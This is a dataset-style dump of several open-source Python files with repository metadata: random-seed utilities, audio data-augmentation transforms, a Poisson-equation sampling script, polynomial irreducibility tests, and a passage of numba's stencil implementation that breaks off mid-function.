repo_name
stringlengths 7
94
| repo_path
stringlengths 4
237
| repo_head_hexsha
stringlengths 40
40
| content
stringlengths 10
680k
| apis
stringlengths 2
840k
|
---|---|---|---|---|
AdrianP-/rlcard | rlcard/utils/seeding.py | 5b99dc8faa4c97ecac2d1189967b90c45d79624b | #The MIT License
#
#Copyright (c) 2020 DATA Lab at Texas A&M University
#Copyright (c) 2016 OpenAI (https://openai.com)
#
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import hashlib
import numpy as np
import os
import struct
def colorize(string, color, bold=False, highlight = False):
"""Return string surrounded by appropriate terminal color codes to
print colorized text. Valid colors: gray, red, green, yellow,
blue, magenta, cyan, white, crimson
"""
attr = []
num = color2num[color]
if highlight: num += 10
attr.append(str(num))
if bold: attr.append('1')
attrs = ';'.join(attr)
return '\x1b[%sm%s\x1b[0m' % (attrs, string)
def error(msg, *args):
print(colorize('%s: %s'%('ERROR', msg % args), 'red'))
def np_random(seed=None):
if seed is not None and not (isinstance(seed, int) and 0 <= seed):
raise error.Error('Seed must be a non-negative integer or omitted, not {}'.format(seed))
seed = create_seed(seed)
rng = np.random.RandomState()
rng.seed(_int_list_from_bigint(hash_seed(seed)))
return rng, seed
def hash_seed(seed=None, max_bytes=8):
"""Any given evaluation is likely to have many PRNG's active at
once. (Most commonly, because the environment is running in
multiple processes.) There's literature indicating that having
linear correlations between seeds of multiple PRNG's can correlate
the outputs:
http://blogs.unity3d.com/2015/01/07/a-primer-on-repeatable-random-numbers/
http://stackoverflow.com/questions/1554958/how-different-do-random-seeds-need-to-be
http://dl.acm.org/citation.cfm?id=1276928
Thus, for sanity we hash the seeds before using them. (This scheme
is likely not crypto-strength, but it should be good enough to get
rid of simple correlations.)
Args:
seed (Optional[int]): None seeds from an operating system specific randomness source.
max_bytes: Maximum number of bytes to use in the hashed seed.
"""
if seed is None:
seed = create_seed(max_bytes=max_bytes)
hash = hashlib.sha512(str(seed).encode('utf8')).digest()
return _bigint_from_bytes(hash[:max_bytes])
def create_seed(a=None, max_bytes=8):
"""Create a strong random seed. Otherwise, Python 2 would seed using
the system time, which might be non-robust especially in the
presence of concurrency.
Args:
a (Optional[int, str]): None seeds from an operating system specific randomness source.
max_bytes: Maximum number of bytes to use in the seed.
"""
# Adapted from https://svn.python.org/projects/python/tags/r32/Lib/random.py
if a is None:
a = _bigint_from_bytes(os.urandom(max_bytes))
elif isinstance(a, str):
a = a.encode('utf8')
a += hashlib.sha512(a).digest()
a = _bigint_from_bytes(a[:max_bytes])
elif isinstance(a, int):
a = a % 2**(8 * max_bytes)
else:
raise error.Error('Invalid type for seed: {} ({})'.format(type(a), a))
return a
# TODO: don't hardcode sizeof_int here
def _bigint_from_bytes(bytes):
sizeof_int = 4
padding = sizeof_int - len(bytes) % sizeof_int
bytes += b'\0' * padding
int_count = int(len(bytes) / sizeof_int)
unpacked = struct.unpack("{}I".format(int_count), bytes)
accum = 0
for i, val in enumerate(unpacked):
accum += 2 ** (sizeof_int * 8 * i) * val
return accum
def _int_list_from_bigint(bigint):
# Special case 0
if bigint < 0:
raise error.Error('Seed must be non-negative, not {}'.format(bigint))
elif bigint == 0:
return [0]
ints = []
while bigint > 0:
bigint, mod = divmod(bigint, 2 ** 32)
ints.append(mod)
return ints
| [((39, 10, 39, 33), 'numpy.random.RandomState', 'np.random.RandomState', ({}, {}), '()', True, 'import numpy as np\n'), ((78, 31, 78, 52), 'os.urandom', 'os.urandom', ({(78, 42, 78, 51): 'max_bytes'}, {}), '(max_bytes)', False, 'import os\n'), ((81, 13, 81, 30), 'hashlib.sha512', 'hashlib.sha512', ({(81, 28, 81, 29): 'a'}, {}), '(a)', False, 'import hashlib\n')] |
ex4sperans/freesound-classification | ops/transforms.py | 71b9920ce0ae376aa7f1a3a2943f0f92f4820813 | import random
import math
from functools import partial
import json
import pysndfx
import librosa
import numpy as np
import torch
from ops.audio import (
read_audio, compute_stft, trim_audio, mix_audio_and_labels,
shuffle_audio, cutout
)
SAMPLE_RATE = 44100
class Augmentation:
"""A base class for data augmentation transforms"""
pass
class MapLabels:
def __init__(self, class_map, drop_raw=True):
self.class_map = class_map
def __call__(self, dataset, **inputs):
labels = np.zeros(len(self.class_map), dtype=np.float32)
for c in inputs["raw_labels"]:
labels[self.class_map[c]] = 1.0
transformed = dict(inputs)
transformed["labels"] = labels
transformed.pop("raw_labels")
return transformed
class MixUp(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
first_audio, first_labels = inputs["audio"], inputs["labels"]
random_sample = dataset.random_clean_sample()
new_audio, new_labels = mix_audio_and_labels(
first_audio, random_sample["audio"],
first_labels, random_sample["labels"]
)
transformed["audio"] = new_audio
transformed["labels"] = new_labels
return transformed
class FlipAudio(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = np.flipud(inputs["audio"])
return transformed
class AudioAugmentation(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
effects_chain = (
pysndfx.AudioEffectsChain()
.reverb(
reverberance=random.randrange(50),
room_scale=random.randrange(50),
stereo_depth=random.randrange(50)
)
.pitch(shift=random.randrange(-300, 300))
.overdrive(gain=random.randrange(2, 10))
.speed(random.uniform(0.9, 1.1))
)
transformed["audio"] = effects_chain(inputs["audio"])
return transformed
class LoadAudio:
def __init__(self):
pass
def __call__(self, dataset, **inputs):
audio, sr = read_audio(inputs["filename"])
transformed = dict(inputs)
transformed["audio"] = audio
transformed["sr"] = sr
return transformed
class STFT:
eps = 1e-4
def __init__(self, n_fft, hop_size):
self.n_fft = n_fft
self.hop_size = hop_size
def __call__(self, dataset, **inputs):
stft = compute_stft(
inputs["audio"],
window_size=self.n_fft, hop_size=self.hop_size,
eps=self.eps)
transformed = dict(inputs)
transformed["stft"] = np.transpose(stft)
return transformed
class AudioFeatures:
eps = 1e-4
def __init__(self, descriptor, verbose=True):
name, *args = descriptor.split("_")
self.feature_type = name
if name == "stft":
n_fft, hop_size = args
self.n_fft = int(n_fft)
self.hop_size = int(hop_size)
self.n_features = self.n_fft // 2 + 1
self.padding_value = 0.0
if verbose:
print(
"\nUsing STFT features with params:\n",
"n_fft: {}, hop_size: {}".format(
n_fft, hop_size
)
)
elif name == "mel":
n_fft, hop_size, n_mel = args
self.n_fft = int(n_fft)
self.hop_size = int(hop_size)
self.n_mel = int(n_mel)
self.n_features = self.n_mel
self.padding_value = 0.0
if verbose:
print(
"\nUsing mel features with params:\n",
"n_fft: {}, hop_size: {}, n_mel: {}".format(
n_fft, hop_size, n_mel
)
)
elif name == "raw":
self.n_features = 1
self.padding_value = 0.0
if verbose:
print(
"\nUsing raw waveform features."
)
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if self.feature_type == "stft":
# stft = compute_stft(
# inputs["audio"],
# window_size=self.n_fft, hop_size=self.hop_size,
# eps=self.eps, log=True
# )
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
elif self.feature_type == "mel":
stft = compute_stft(
inputs["audio"],
window_size=self.n_fft, hop_size=self.hop_size,
eps=self.eps, log=False
)
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
elif self.feature_type == "raw":
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
return transformed
class SampleSegment(Augmentation):
def __init__(self, ratio=(0.3, 0.9), p=1.0):
self.min, self.max = ratio
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
original_size = inputs["audio"].size
target_size = int(np.random.uniform(self.min, self.max) * original_size)
start = np.random.randint(original_size - target_size - 1)
transformed["audio"] = inputs["audio"][start:start+target_size]
return transformed
class ShuffleAudio(Augmentation):
def __init__(self, chunk_length=0.5, p=0.5):
self.chunk_length = chunk_length
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = shuffle_audio(
transformed["audio"], self.chunk_length, sr=transformed["sr"])
return transformed
class CutOut(Augmentation):
def __init__(self, area=0.25, p=0.5):
self.area = area
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = cutout(
transformed["audio"], self.area)
return transformed
class SampleLongAudio:
def __init__(self, max_length):
self.max_length = max_length
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if (inputs["audio"].size / inputs["sr"]) > self.max_length:
max_length = self.max_length * inputs["sr"]
start = np.random.randint(0, inputs["audio"].size - max_length)
transformed["audio"] = inputs["audio"][start:start+max_length]
return transformed
class OneOf:
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, dataset, **inputs):
transform = random.choice(self.transforms)
return transform(**inputs)
class DropFields:
def __init__(self, fields):
self.to_drop = fields
def __call__(self, dataset, **inputs):
transformed = dict()
for name, input in inputs.items():
if not name in self.to_drop:
transformed[name] = input
return transformed
class RenameFields:
def __init__(self, mapping):
self.mapping = mapping
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
for old, new in self.mapping.items():
transformed[new] = transformed.pop(old)
return transformed
class Compose:
def __init__(self, transforms):
self.transforms = transforms
def switch_off_augmentations(self):
for t in self.transforms:
if isinstance(t, Augmentation):
t.p = 0.0
def __call__(self, dataset=None, **inputs):
for t in self.transforms:
inputs = t(dataset=dataset, **inputs)
return inputs
class Identity:
def __call__(self, dataset=None, **inputs):
return inputs | [((119, 20, 119, 50), 'ops.audio.read_audio', 'read_audio', ({(119, 31, 119, 49): "inputs['filename']"}, {}), "(inputs['filename'])", False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((139, 15, 142, 25), 'ops.audio.compute_stft', 'compute_stft', (), '', False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((145, 30, 145, 48), 'numpy.transpose', 'np.transpose', ({(145, 43, 145, 47): 'stft'}, {}), '(stft)', True, 'import numpy as np\n'), ((320, 20, 320, 50), 'random.choice', 'random.choice', ({(320, 34, 320, 49): 'self.transforms'}, {}), '(self.transforms)', False, 'import random\n'), ((54, 11, 54, 30), 'numpy.random.uniform', 'np.random.uniform', ({}, {}), '()', True, 'import numpy as np\n'), ((57, 36, 60, 13), 'ops.audio.mix_audio_and_labels', 'mix_audio_and_labels', ({(58, 16, 58, 27): 'first_audio', (58, 29, 58, 51): "random_sample['audio']", (59, 16, 59, 28): 'first_labels', (59, 30, 59, 53): "random_sample['labels']"}, {}), "(first_audio, random_sample['audio'], first_labels,\n random_sample['labels'])", False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((78, 11, 78, 30), 'numpy.random.uniform', 'np.random.uniform', ({}, {}), '()', True, 'import numpy as np\n'), ((79, 35, 79, 61), 'numpy.flipud', 'np.flipud', ({(79, 45, 79, 60): "inputs['audio']"}, {}), "(inputs['audio'])", True, 'import numpy as np\n'), ((94, 11, 94, 30), 'numpy.random.uniform', 'np.random.uniform', ({}, {}), '()', True, 'import numpy as np\n'), ((218, 36, 218, 71), 'numpy.expand_dims', 'np.expand_dims', ({(218, 51, 218, 66): "inputs['audio']", (218, 68, 218, 70): '-1'}, {}), "(inputs['audio'], -1)", True, 'import numpy as np\n'), ((247, 11, 247, 30), 'numpy.random.uniform', 'np.random.uniform', ({}, {}), '()', True, 'import numpy as np\n'), ((250, 20, 250, 70), 'numpy.random.randint', 'np.random.randint', ({(250, 38, 250, 69): 'original_size - target_size - 1'}, {}), '(original_size - target_size - 1)', True, 'import numpy as np\n'), ((267, 11, 267, 30), 'numpy.random.uniform', 'np.random.uniform', ({}, {}), '()', True, 'import numpy as np\n'), ((268, 35, 269, 78), 'ops.audio.shuffle_audio', 'shuffle_audio', (), '', False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((285, 11, 285, 30), 'numpy.random.uniform', 'np.random.uniform', ({}, {}), '()', True, 'import numpy as np\n'), ((286, 35, 287, 48), 'ops.audio.cutout', 'cutout', ({(287, 16, 287, 36): "transformed['audio']", (287, 38, 287, 47): 'self.area'}, {}), "(transformed['audio'], self.area)", False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((306, 20, 306, 75), 'numpy.random.randint', 'np.random.randint', ({(306, 38, 306, 39): '0', (306, 41, 306, 74): "inputs['audio'].size - max_length"}, {}), "(0, inputs['audio'].size - max_length)", True, 'import numpy as np\n'), ((104, 23, 104, 47), 'random.uniform', 'random.uniform', ({(104, 38, 104, 41): '0.9', (104, 43, 104, 46): '1.1'}, {}), '(0.9, 1.1)', False, 'import random\n'), ((222, 19, 226, 13), 'ops.audio.compute_stft', 'compute_stft', (), '', False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((228, 36, 228, 71), 'numpy.expand_dims', 'np.expand_dims', ({(228, 51, 228, 66): "inputs['audio']", (228, 68, 228, 70): '-1'}, {}), "(inputs['audio'], -1)", True, 'import numpy as np\n'), ((231, 36, 231, 71), 'numpy.expand_dims', 'np.expand_dims', ({(231, 51, 231, 66): "inputs['audio']", (231, 68, 231, 70): '-1'}, {}), "(inputs['audio'], -1)", True, 'import numpy as np\n'), ((249, 30, 249, 67), 'numpy.random.uniform', 'np.random.uniform', ({(249, 48, 249, 56): 'self.min', (249, 58, 249, 66): 'self.max'}, {}), '(self.min, self.max)', True, 'import numpy as np\n'), ((103, 32, 103, 55), 'random.randrange', 'random.randrange', ({(103, 49, 103, 50): '2', (103, 52, 103, 54): '10'}, {}), '(2, 10)', False, 'import random\n'), ((102, 29, 102, 56), 'random.randrange', 'random.randrange', ({(102, 46, 102, 50): '-300', (102, 52, 102, 55): '300'}, {}), '(-300, 300)', False, 'import random\n'), ((96, 16, 96, 43), 'pysndfx.AudioEffectsChain', 'pysndfx.AudioEffectsChain', ({}, {}), '()', False, 'import pysndfx\n'), ((98, 33, 98, 53), 'random.randrange', 'random.randrange', ({(98, 50, 98, 52): '50'}, {}), '(50)', False, 'import random\n'), ((99, 31, 99, 51), 'random.randrange', 'random.randrange', ({(99, 48, 99, 50): '50'}, {}), '(50)', False, 'import random\n'), ((100, 33, 100, 53), 'random.randrange', 'random.randrange', ({(100, 50, 100, 52): '50'}, {}), '(50)', False, 'import random\n')] |
mathematicalmichael/thesis | figures/pp.py | 2906b10f94960c3e75bdb48e5b8b583f59b9441e | #!/usr/env/bin python
import os
# os.environ['OMP_NUM_THREADS'] = '1'
from newpoisson import poisson
import numpy as np
from fenics import set_log_level, File, RectangleMesh, Point
mesh = RectangleMesh(Point(0,0), Point(1,1), 36, 36)
# comm = mesh.mpi_comm()
set_log_level(40) # ERROR=40
# from mpi4py import MPI
# comm = MPI.COMM_WORLD
# rank = comm.Get_rank()
if __name__=='__main__':
import argparse
parser = argparse.ArgumentParser(description="Poisson Problem")
parser.add_argument('-n', '--num', default = 10, type=int,
help="Number of samples")
parser.add_argument('-o', '--outfile', default='results',
help="Output filename (no extension)")
parser.add_argument('-i', '--input-dim', default=1, type=int)
parser.add_argument('-d', '--dist', default='u', help='Distribution. `n` (normal), `u` (uniform, default)')
args = parser.parse_args()
num_samples = args.num
dist = args.dist
outfile = args.outfile.replace('.pkl','')
inputdim = args.input_dim
if inputdim == 1: # U[1,5]
randsamples = 1 + 4*np.random.rand(num_samples)
else: # N(0,1)
if dist == 'n':
randsamples = np.random.randn(num_samples, inputdim)
elif dist == 'u':
randsamples = -4*np.random.rand(num_samples, inputdim)
else:
raise ValueError("Improper distribution choice, use `n` (normal), `u` (uniform)")
sample_seed_list = list(zip(range(num_samples), randsamples))
def wrapper(sample, outfile):
g=sample[1]
u = poisson(gamma=g, mesh=mesh)
# Save solution
fname = f"{outfile}-data/poisson-{int(sample[0]):06d}.xml"
File(fname, 'w') << u
return {int(sample[0]): {'u': fname, 'gamma': sample[1]}}
results = []
for sample in sample_seed_list:
r = wrapper(sample, outfile)
results.append(r)
# print(results)
import pickle
pickle.dump(results, open(f'{outfile}.pkl','wb'))
| [((11, 0, 11, 17), 'fenics.set_log_level', 'set_log_level', ({(11, 14, 11, 16): '(40)'}, {}), '(40)', False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((8, 21, 8, 31), 'fenics.Point', 'Point', ({(8, 27, 8, 28): '0', (8, 29, 8, 30): '0'}, {}), '(0, 0)', False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((8, 33, 8, 43), 'fenics.Point', 'Point', ({(8, 39, 8, 40): '1', (8, 41, 8, 42): '1'}, {}), '(1, 1)', False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((20, 13, 20, 67), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (), '', False, 'import argparse\n'), ((47, 12, 47, 39), 'newpoisson.poisson', 'poisson', (), '', False, 'from newpoisson import poisson\n'), ((37, 26, 37, 64), 'numpy.random.randn', 'np.random.randn', ({(37, 42, 37, 53): 'num_samples', (37, 55, 37, 63): 'inputdim'}, {}), '(num_samples, inputdim)', True, 'import numpy as np\n'), ((50, 8, 50, 24), 'fenics.File', 'File', ({(50, 13, 50, 18): 'fname', (50, 20, 50, 23): '"""w"""'}, {}), "(fname, 'w')", False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((34, 28, 34, 55), 'numpy.random.rand', 'np.random.rand', ({(34, 43, 34, 54): 'num_samples'}, {}), '(num_samples)', True, 'import numpy as np\n'), ((39, 29, 39, 66), 'numpy.random.rand', 'np.random.rand', ({(39, 44, 39, 55): 'num_samples', (39, 57, 39, 65): 'inputdim'}, {}), '(num_samples, inputdim)', True, 'import numpy as np\n')] |
kluhan/seraphim | additions/irreducible_check.py | 412b693effb15f80d348d6d885d7c781774bb8aa | """
Irreduzibilitätskriterien
Implementiert wurden das Eisenstein- und das Perronkriterium
Quellen:
https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
Übergeben werden Polynome vom Typ Polynomial, keine direkten Listen von Koeffizienten
"""
import logging
import helper
import itertools
def factor(n):
# Faktorisierung einer Zahl n
i = 0
factors = []
for i in range(1, n + 1):
if n % i == 0:
factors.append(i)
return factors
def prime_factor(n):
# Primfaktorzerlegung einer Zahl n
i = 2
factors = []
while i * i <= n:
if n % i:
i += 1
else:
n //= i
factors.append(i)
if n > 1:
factors.append(n)
return factors
# rekursive Implementierung von HCF
def hcf(x, y):
"""Highest common factor"""
if y == 0:
return x
else:
return hcf(y, x % y)
def is_polynomial_coprime(polynomial):
"""Überprüft, ob ein Polynom teilerfremd (coprime) ist"""
non_zero_polynomial = [
i for i in polynomial.coefficients if i != 0
] # Nullen würden Ergebnis von HCF verfälschen
if polynomial.degree() == 0:
return True
for x, y in itertools.combinations(non_zero_polynomial, 2):
if hcf(x, y) != 1:
return False
return True
# Quelle: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
def is_irreducible_perron(polynomial):
"""
Prüft ein Polynom auf Irreduzierbarkeit (Perron).
Führender Koeffizient != 1 funktioniert nicht.
Keine Aussage möglich, wenn vorletzer Koeffizient kleiner ist als die absolute Summe der restlichen Koeffizienten
"""
if polynomial.degree() < 0:
return logging.error("Polynom ungültig")
const_coefficient = polynomial.coefficients[0]
if const_coefficient == 0:
return 0
lead_coefficient = polynomial.coefficients[polynomial.degree()]
assert lead_coefficient == 1
nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1])
total = 1
i = 0
for coeff in polynomial.coefficients:
if i < polynomial.degree() - 1:
total += abs(coeff)
i = i + 1
if nm1_coefficient > total:
return 1
return 2
# Quellen: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf
# http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
def is_irreducible_eisenstein(polynomial):
"""
Eine Implementierung des Eisensteinkriteriums.
"""
# Polynom muss einen Grad m >= 1 haben
if polynomial.degree() < 1:
return 2
# Voraussetzung für Eisenstein sind teilerfremde Koeffizienten
if helper.is_polynomial_coprime(polynomial is False):
return 2
# Prüfe, ob es eine Primzahl gibt, die alle Koeffizienten des Polynoms bis Grad m - 1 teilt. p^2 darf a0 nicht teilen
const_coeff = polynomial.coefficients[0]
if const_coeff == 0:
return 0
# Erhalte Primfaktorzerlegung der Konstante, um Grundlage von Primzahlen zu erhalten
prime_factors = helper.prime_factor(const_coeff)
for p in prime_factors:
if (
const_coeff % pow(p, 2) != 0
): # teilt p^2 den konstanten Koeffizienten, dann kann keine Aussage getroffen werden
return 2
for coeff in polynomial.coefficients[0 : polynomial.degree() - 1]:
if coeff % p != 0:
return 2 # teilt die Primzahl den Koeffizienten nicht, kann keine Aussage getroffen werden
return 1
| [((60, 16, 60, 62), 'itertools.combinations', 'itertools.combinations', ({(60, 39, 60, 58): 'non_zero_polynomial', (60, 60, 60, 61): '(2)'}, {}), '(non_zero_polynomial, 2)', False, 'import itertools\n'), ((109, 7, 109, 56), 'helper.is_polynomial_coprime', 'helper.is_polynomial_coprime', ({(109, 36, 109, 55): '(polynomial is False)'}, {}), '(polynomial is False)', False, 'import helper\n'), ((119, 20, 119, 52), 'helper.prime_factor', 'helper.prime_factor', ({(119, 40, 119, 51): 'const_coeff'}, {}), '(const_coeff)', False, 'import helper\n'), ((75, 15, 75, 49), 'logging.error', 'logging.error', ({(75, 29, 75, 48): '"""Polynom ungültig"""'}, {}), "('Polynom ungültig')", False, 'import logging\n')] |
auderson/numba | numba/stencils/stencil.py | 3d67c9850ab56457f418cf40af6245fd9c337705 | #
# Copyright (c) 2017 Intel Corporation
# SPDX-License-Identifier: BSD-2-Clause
#
import copy
import numpy as np
from llvmlite import ir as lir
from numba.core import types, typing, utils, ir, config, ir_utils, registry
from numba.core.typing.templates import (CallableTemplate, signature,
infer_global, AbstractTemplate)
from numba.core.imputils import lower_builtin
from numba.core.extending import register_jitable
from numba.core.errors import NumbaValueError
from numba.misc.special import literal_unroll
import numba
import operator
from numba.np import numpy_support
class StencilFuncLowerer(object):
'''Callable class responsible for lowering calls to a specific StencilFunc.
'''
def __init__(self, sf):
self.stencilFunc = sf
def __call__(self, context, builder, sig, args):
cres = self.stencilFunc.compile_for_argtys(sig.args, {},
sig.return_type, None)
res = context.call_internal(builder, cres.fndesc, sig, args)
context.add_linking_libs([cres.library])
return res
@register_jitable
def raise_if_incompatible_array_sizes(a, *args):
ashape = a.shape
# We need literal_unroll here because the stencil might take
# multiple input arrays with different types that are not compatible
# (e.g. values as float[:] and flags as bool[:])
# When more than three total arrays are given, the second and third
# are iterated over in the loop below. Without literal_unroll, their
# types have to match.
# An example failing signature without literal_unroll might be
# (float[:], float[:], bool[:]) (Just (float[:], bool[:]) wouldn't fail)
for arg in literal_unroll(args):
if a.ndim != arg.ndim:
raise ValueError("Secondary stencil array does not have same number "
" of dimensions as the first stencil input.")
argshape = arg.shape
for i in range(len(ashape)):
if ashape[i] > argshape[i]:
raise ValueError("Secondary stencil array has some dimension "
"smaller the same dimension in the first "
"stencil input.")
def slice_addition(the_slice, addend):
""" Called by stencil in Python mode to add the loop index to a
user-specified slice.
"""
return slice(the_slice.start + addend, the_slice.stop + addend)
class StencilFunc(object):
"""
A special type to hold stencil information for the IR.
"""
id_counter = 0
def __init__(self, kernel_ir, mode, options):
self.id = type(self).id_counter
type(self).id_counter += 1
self.kernel_ir = kernel_ir
self.mode = mode
self.options = options
self.kws = [] # remember original kws arguments
# stencils only supported for CPU context currently
self._typingctx = registry.cpu_target.typing_context
self._targetctx = registry.cpu_target.target_context
self._typingctx.refresh()
self._targetctx.refresh()
self._install_type(self._typingctx)
self.neighborhood = self.options.get("neighborhood")
self._type_cache = {}
self._lower_me = StencilFuncLowerer(self)
def replace_return_with_setitem(self, blocks, index_vars, out_name):
"""
Find return statements in the IR and replace them with a SetItem
call of the value "returned" by the kernel into the result array.
Returns the block labels that contained return statements.
"""
ret_blocks = []
for label, block in blocks.items():
scope = block.scope
loc = block.loc
new_body = []
for stmt in block.body:
if isinstance(stmt, ir.Return):
ret_blocks.append(label)
# If 1D array then avoid the tuple construction.
if len(index_vars) == 1:
rvar = ir.Var(scope, out_name, loc)
ivar = ir.Var(scope, index_vars[0], loc)
new_body.append(ir.SetItem(rvar, ivar, stmt.value, loc))
else:
# Convert the string names of the index variables into
# ir.Var's.
var_index_vars = []
for one_var in index_vars:
index_var = ir.Var(scope, one_var, loc)
var_index_vars += [index_var]
s_index_name = ir_utils.mk_unique_var("stencil_index")
s_index_var = ir.Var(scope, s_index_name, loc)
# Build a tuple from the index ir.Var's.
tuple_call = ir.Expr.build_tuple(var_index_vars, loc)
new_body.append(ir.Assign(tuple_call, s_index_var, loc))
rvar = ir.Var(scope, out_name, loc)
# Write the return statements original value into
# the array using the tuple index.
si = ir.SetItem(rvar, s_index_var, stmt.value, loc)
new_body.append(si)
else:
new_body.append(stmt)
block.body = new_body
return ret_blocks
def add_indices_to_kernel(self, kernel, index_names, ndim,
neighborhood, standard_indexed, typemap, calltypes):
"""
Transforms the stencil kernel as specified by the user into one
that includes each dimension's index variable as part of the getitem
calls. So, in effect array[-1] becomes array[index0-1].
"""
const_dict = {}
kernel_consts = []
if config.DEBUG_ARRAY_OPT >= 1:
print("add_indices_to_kernel", ndim, neighborhood)
ir_utils.dump_blocks(kernel.blocks)
if neighborhood is None:
need_to_calc_kernel = True
else:
need_to_calc_kernel = False
if len(neighborhood) != ndim:
raise ValueError("%d dimensional neighborhood specified for %d " \
"dimensional input array" % (len(neighborhood), ndim))
tuple_table = ir_utils.get_tuple_table(kernel.blocks)
relatively_indexed = set()
for block in kernel.blocks.values():
scope = block.scope
loc = block.loc
new_body = []
for stmt in block.body:
if (isinstance(stmt, ir.Assign) and
isinstance(stmt.value, ir.Const)):
if config.DEBUG_ARRAY_OPT >= 1:
print("remembering in const_dict", stmt.target.name,
stmt.value.value)
# Remember consts for use later.
const_dict[stmt.target.name] = stmt.value.value
if ((isinstance(stmt, ir.Assign)
and isinstance(stmt.value, ir.Expr)
and stmt.value.op in ['setitem', 'static_setitem']
and stmt.value.value.name in kernel.arg_names) or
(isinstance(stmt, ir.SetItem)
and stmt.target.name in kernel.arg_names)):
raise ValueError("Assignments to arrays passed to stencil " \
"kernels is not allowed.")
if (isinstance(stmt, ir.Assign)
and isinstance(stmt.value, ir.Expr)
and stmt.value.op in ['getitem', 'static_getitem']
and stmt.value.value.name in kernel.arg_names
and stmt.value.value.name not in standard_indexed):
# We found a getitem from the input array.
if stmt.value.op == 'getitem':
stmt_index_var = stmt.value.index
else:
stmt_index_var = stmt.value.index_var
# allow static_getitem since rewrite passes are applied
#raise ValueError("Unexpected static_getitem in add_indices_to_kernel.")
relatively_indexed.add(stmt.value.value.name)
# Store the index used after looking up the variable in
# the const dictionary.
if need_to_calc_kernel:
assert hasattr(stmt_index_var, 'name')
if stmt_index_var.name in tuple_table:
kernel_consts += [tuple_table[stmt_index_var.name]]
elif stmt_index_var.name in const_dict:
kernel_consts += [const_dict[stmt_index_var.name]]
else:
raise NumbaValueError("stencil kernel index is not "
"constant, 'neighborhood' option required")
if ndim == 1:
# Single dimension always has index variable 'index0'.
# tmpvar will hold the real index and is computed by
# adding the relative offset in stmt.value.index to
# the current absolute location in index0.
index_var = ir.Var(scope, index_names[0], loc)
tmpname = ir_utils.mk_unique_var("stencil_index")
tmpvar = ir.Var(scope, tmpname, loc)
stmt_index_var_typ = typemap[stmt_index_var.name]
# If the array is indexed with a slice then we
# have to add the index value with a call to
# slice_addition.
if isinstance(stmt_index_var_typ, types.misc.SliceType):
sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
sa_func = numba.njit(slice_addition)
sa_func_typ = types.functions.Dispatcher(sa_func)
typemap[sa_var.name] = sa_func_typ
g_sa = ir.Global("slice_addition", sa_func, loc)
new_body.append(ir.Assign(g_sa, sa_var, loc))
slice_addition_call = ir.Expr.call(sa_var, [stmt_index_var, index_var], (), loc)
calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [stmt_index_var_typ, types.intp], {})
new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value, tmpvar, loc),
stmt.target, loc))
else:
acc_call = ir.Expr.binop(operator.add, stmt_index_var,
index_var, loc)
new_body.append(ir.Assign(acc_call, tmpvar, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value, tmpvar, loc),
stmt.target, loc))
else:
index_vars = []
sum_results = []
s_index_name = ir_utils.mk_unique_var("stencil_index")
s_index_var = ir.Var(scope, s_index_name, loc)
